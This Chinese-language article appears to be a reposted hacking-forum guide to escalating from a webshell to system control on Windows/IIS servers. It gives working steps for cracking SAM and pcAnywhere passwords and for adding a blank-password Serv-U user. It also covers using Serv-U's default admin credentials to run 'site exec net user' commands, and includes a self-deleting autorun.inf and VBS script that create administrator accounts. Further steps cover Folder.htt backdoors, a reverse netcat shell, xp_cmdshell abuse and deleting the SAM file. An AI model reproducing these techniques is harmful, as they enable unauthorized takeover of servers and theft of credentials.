最全的Webshell提權方法總結
在得到了一個Webshell之后,如果能進一步利用系統的配置不當取得更高的權限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區別。本文將從一個大角度總括當前流行的各種提權方法,希望對大家有所啟發,起到一個拋磚引玉的作用。
WEBSHELL權限提升技巧
c: d: e:.....
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能不能跳轉,我們從這里可以獲取好多有用的信息比如Serv-U的路徑,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM,破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多時候沒作限制,把提升權限的工具上傳上去,然后執行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\ BBS.bitsCN.com國內最早的網管論壇
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服務器支持PHP)
c:\PHP(如果服務器支持PHP)
運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限
還可以用這段代碼試提升,好象不是很理想的
如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下
replace 替換法 捆綁
腳本 編寫一個啟動/關機腳本 重起
刪SAM :( 錯
CAcls命令
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的權限提升21大法!
以下全部是本人提權時候的總結 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過
的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助!
1.radmin連接法
條件是你權限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去 。本人從來米成功過,端口到是給對方打開了。
2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF
文件,在本地安裝pcanywhere上去
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之
4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉
進去后,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
這個用戶具有最高權限,然后我們就可以ftp上去 quote site exec xxx 來提升權限
5.c:\winnt\system32\inetsrv\data\
引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,
然后執行
6.SU溢出提權
這個網上教程N多 不詳細講解了
7.運行Csript
引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提
升權限
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了
8.腳本提權
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs
9.VNC
這個是小花的文章 HOHO
默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password
我們可以用vncx4
破解它,vncx4使用很簡單,只要在命令行下輸入
c:\>vncx4 -W
然后順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。
10.NC提權
給對方來個NC 但是條件是你要有足夠的運行權限 然后把它反彈到自己的電腦上 HOHO OK了
11.社會工程學之GUEST提權
很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵
箱號 手機號 盡量看看 HOHO
12.IPC空連接
如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令
13.替換服務
這個不用說了吧?個人感覺相當復雜
14.autorun .inf
autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信
他不運行
15.desktop.ini與Folder.htt
引用:首先,我們現在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇"自定義
文件夾"(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder
setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護的操作系統文件")然后
我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:
然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方
任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的后門
16.su覆蓋提權
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重
起一下Serv-U,于是你上面的所有配置都與他的一模一樣了
17.SU轉發端口
43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執行命令: Fpipe –v –l 3333 –r
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個
服務器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的
Serv-u了
18.SQL帳戶密碼泄露
如果對方開了MSSQL服務器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數據庫的
ASP文件中看到),因為MSSQL是默認的SYSTEM權限。
引用:對方沒有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass DL.bitsCN.com網管軟件下載
中填入你所得到的用戶名與密碼。format選擇xp_cmdshell"%s"即可。然后點擊connect,連接上后就可
以在CMD一欄中輸入你想要的CMD命令了
19.asp.dll
引用:因為asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定相同
)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
好了,現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去
了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到
C:\Inetpub\AdminScripts>這個目錄下.
那么如果你是一個管理員,你的機子被人用這招把asp提升為system權限,那么,這時,防的方法就是把
asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛才的那些東東.
20.Magic Winmail
前提是你要有個webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587這里去看吧
21.DBO……
其實 提升權限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務器控制到底!
感謝noangel
WEBSHELL權限提升
動網上傳漏洞,相信大家拿下不少肉雞吧,但是都是WEBSHELL,不能拿到系統權限,要如何拿到系統權限呢?這正是我們這次要討論的內容
OK,進入我的WEBSHELL
啊哈,不錯,雙CPU,速度應該跟的上,不拿下你我怎么甘心啊
輸入密碼,進入到里面看看,有什么好東西沒有,翻了下,好像也沒有什么特別的東西,看看能不能進到其他的盤符,點了下C盤,不錯不錯,可以進去,這樣提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,記得有次看到SERV-U有默認的用戶名和密碼,但是監聽的端口是43958,而且是只有本地才能訪問的,但是我們有端口轉發工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
顯示竟然是3.0的,唉,不得不說這個管理員真的不稱職。后來完畢后掃描了下,也只有FTP的洞沒有補。既然是這樣,我們就開始我們的提升權限了
上傳FPIPE,端口轉發工具, 圖三
在運行CMD命令里輸入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉發到81端口
然后打開我們自己機子上的SERV-U,點Serv-U服務器,點菜單欄上的的服務器,點新建服務器,然后輸入IP,輸入端口,記得端口是剛剛我們轉發的 81端口。服務名稱隨便你喜歡,怎么樣都行。然后是用戶名:LocalAdministrator 密碼:#l@$ak#.lk;0@P (密碼都是字母)
確定,然后點剛剛建的服務器,然后就可以看到已有的用戶,自己新建一個用戶,把所有權限加上。也不鎖定根目錄
接下來就是登陸了,登陸FTP一定要在CMD下登陸,
進入后一般命令和DOS一樣,添加用戶的時候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果對方開了3389的話,就不用我教你怎么做了,沒開的話,新建立IPC連接,在上傳木馬或者是開啟3389的工具
二
auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是這樣要可以訪問到對方的根目錄。將這兩個文件放到對方硬盤的根目錄下。當然你也可以直接執行木馬程序,還要一個木馬程序,但是語句就和最后兩句一樣,通過CMD執行木馬程序
三
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下,覺得一個不夠,可以多放幾個
Folder.htt添加代碼
但是后門和這兩個文件必須要放到一塊,有點問題,可以結合啟動VBS,運行結束后,刪除上傳的后門.就是CODEBASE="shell.vbs".shell寫法如上
四
replace
替換法,可以替換正在執行的文件。用這個幾乎可以馬上得到權限,但是我沒有做過試驗,可以試下,將對方正在執行的文件替換為和它文件名一樣的,捆綁了木馬的。為什么不直接替換木馬呢?如果替換的是關鍵程序,那不是就直接掛了?所以還是捆綁好點 www.bitsCN.net網管博客等你來搏
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]
[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]
[/R] [/S] [/W]
[drive1:][path1]filename 指定源文件。
[drive2:][path2] 指定要替換文件的
目錄。
/A 把新文件加入目標目錄。不能和
/S 或 /U 命令行開關搭配使用。
/P 替換文件或加入源文件之前會先提示您
進行確認。
/R 替換只讀文件以及未受保護的
文件。
/S 替換目標目錄中所有子目錄的文件。
不能與 /A 命令選項
搭配使用。
/W 等您插入磁盤以后再運行。
/U 只會替換或更新比源文件日期早的文件。
不能與 /A 命令行開關搭配使用
這個命令沒有試驗過,看能不能替換不能訪問的文件夾下的文件,大家可以試驗下
五
腳本
編寫一個啟動/關機腳本配置文件scripts.ini,這個文件名是固定的,不能改變。內容如下:
[Startup]
0CmdLine=a.bat
0Parameters=
將文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"
A.BAT的內容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
這樣可以恢復你想要得任意用戶名的密碼,也可以自己增加新的用戶,但是要依賴重啟,還有就是對SYSTEM32有寫的權限
六
SAM
如果可以訪問對方的SYSTEM32的話,刪除對方的SAM文件,等他重啟以后就是ADMIN用戶密碼為空
突然又有了想法,可以用REPLACE命令替換的嗎,可以把你的SAM文件提取出來,上傳到他的任意目錄下,然后替換。不過不知道如果對SYSTEM32沒有權限訪問的話,能不能實現替換。
【編輯推薦】
